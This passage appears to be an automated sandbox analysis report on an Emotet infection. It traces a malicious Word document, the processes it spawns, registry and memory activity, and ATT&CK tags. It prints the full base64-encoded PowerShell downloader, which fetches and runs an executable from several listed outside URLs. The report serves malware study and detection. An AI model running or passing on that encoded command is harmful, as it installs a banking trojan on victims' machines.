7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
7645	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
7645	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs

at	description	Process
15211	Token: SeDebugPrivilege	powershell.exe

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API 1 TTPs 12 IoCs

persistence

Query Registry

T1012

at	description	ioc	Process
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
20281	Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	OSPPSVC.EXE
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	OSPPSVC.EXE
20281	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\	OSPPSVC.EXE
20281	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\	OSPPSVC.EXE
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	OSPPSVC.EXE
20281	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32	OSPPSVC.EXE
20281	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\	OSPPSVC.EXE
20281	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel	OSPPSVC.EXE
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32	OSPPSVC.EXE
20281	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler	OSPPSVC.EXE

Suspicious use of WriteProcessMemory 5 IoCs

at	description	Process	procid_target
27363	PID 840 wrote to memory of 1976	powershell.exe	29
27971	PID 1976 wrote to memory of 1768	506.exe	30
33712	PID 1752 wrote to memory of 1172	loadarouter.exe	32
148810	PID 1172 wrote to memory of 1340	loadarouter.exe	35
148997	PID 1340 wrote to memory of 1556	VkMQcr34DP0mKTUDmSk.exe	36

Executes dropped EXE

Emotet Sync 1 IoCs

trojan banker

description	ioc	Process
Event created	Global\E64C019BB	506.exe

Suspicious behavior: EmotetMutantsSpam
Loads dropped DLL
emotet family
family

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc"
1⤵
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAEQARABCAEEARwBRAEEANABBADEAQQBBAD0AJwBBAHcAQQBCAEMAeABBAEcARwBBACcAOwAkAEIAQQBBAFgAVQBfAHgAdwAxACAAPQAgACcANQAwADYAJwA7ACQAVwBBADQAQQBBAEEAQwBCAEQAXwBCAFEAPQAnAFUAawBBAEQAMQB3AGMAXwAnADsAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQgBBAEEAWABVAF8AeAB3ADEAKwAnAC4AZQB4AGUAJwA7ACQAVABDAEEAWgBBAEcAVQBBAD0AJwBKAEMAXwBBAEEAVQB4AEIAQQBRAEIAUQAnADsAJABSAHgAVQBBAEEANABVAHcAUQBBAEEAQQB3AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABDAEEAWgAxAFUANABBAEIARwBfAEEAQQBBAD0AJwBoAHQAdABwAHMAOgAvAC8AeQBvAHUAcgBnAHAAcwBoAGUAbABwAGUAcgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoADYAMgAyADgANAAwADAALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHkAbwBrAHUAcwBoAGkAbgBtAGkAZABkAGwAZQBlAGEAcwB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZAA0AGgAbwBiAHMAOAA4ADkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAbQBhAGsAbwBzAGgAaQBzAGEAbgBjAGgAYQByAC4AYwBvAG0ALwBoAHQAaAB6ADkAMQAvAGsANgBpAGwAeQBjAHgAMwA1ADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGUAcgBnAGEAbQBhAGUAZwBlAHMAbwBuAGQAYQBqAC4AYwBvAG0ALwAxAHQAMgAwADEAMQAxAHkANgAzAC8AaQBjADUANQAwADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG8AcgBnAGEAbgBpAHoAZQByAHMAbwBuAGQAZQBtAGEAbgBkAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANgB2AHQAZAA3ADMAMAA0AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAEcAUQBDAEQAWAB3AFEAVQBCAFEAQQBCAGsAPQAnAFMAQQBBAEIAQQBHAG8ARwBaAEEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAgAGkAbgAgACQAQwBBAFoAMQBVADQAQQBCAEcAXwBBAEEAQQApAHsAdAByAHkAewAkAFIAeABVAEEAQQA0AFUAdwBRAEEAQQBBAHcALgAiAEQAYABvAFcATgBsAGAATwBhAGQARgBpAGAATABFACIAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAsACAAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABLAEIAQQBaAEMAUQBjAEEAbwA9ACcATgBjAGMAYwBEAEEAQwBBACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVQBEAFUAYwBfAEEAQQAxAEEAXwBBADEAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIANQAzADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABZAFUAQQB3AFUAMQBEAG8APQAnAEgAeABVAEIAQQBBAEQAQQBBACcAOwBiAHIAZQBhAGsAOwAkAFoAeAAxAEIAQQBVAFEAQQBCAGsAQQA9ACcAWABBAEEAVQBBAFUAbwBjADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA0AFUAMQBvAEIAVQBrAFUAPQAnAFIAXwBBAGMANAA0AEEAbwBEAEcARABrAEcAJwA=
1⤵
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5132580951022363388-17572451541480729789-1433489876-11657742471676885814-127177489"
1⤵
PID:1592

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
- Uses Task Scheduler COM API
PID:1944

C:\Users\Admin\506.exe
"C:\Users\Admin\506.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Users\Admin\506.exe
--dec73219
1⤵
- Drops file in system dir
- Emotet Sync
PID:1768

C:\Windows\SysWOW64\loadarouter.exe
"C:\Windows\SysWOW64\loadarouter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\SysWOW64\loadarouter.exe
--f7a216da
1⤵
- Drops file in system dir
- Suspicious use of WriteProcessMemory
PID:1172

C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe
"C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1340

C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe
--af85d12c
1⤵
PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1172-15-0x0000000000310000-0x0000000000327000-memory.dmp

Filesize
92KB

Download
memory/1172-16-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/1260-2-0x00000000062EE000-0x00000000062F2000-memory.dmp

Filesize
16KB

Download
memory/1260-0-0x0000000006200000-0x0000000006204000-memory.dmp

Filesize
16KB

Download
memory/1260-4-0x00000000062EE000-0x00000000062F2000-memory.dmp

Filesize
16KB

Download
memory/1260-1-0x00000000062EE000-0x00000000062F2000-memory.dmp

Filesize
16KB

Download
memory/1556-23-0x0000000000260000-0x0000000000277000-memory.dmp

Filesize
92KB

Download
memory/1556-24-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/1752-13-0x00000000005A0000-0x00000000005B7000-memory.dmp

Filesize
92KB

Download
memory/1768-10-0x00000000002B0000-0x00000000002C7000-memory.dmp

Filesize
92KB

Download
memory/1768-11-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/1976-7-0x0000000000240000-0x0000000000257000-memory.dmp

Filesize
92KB

Download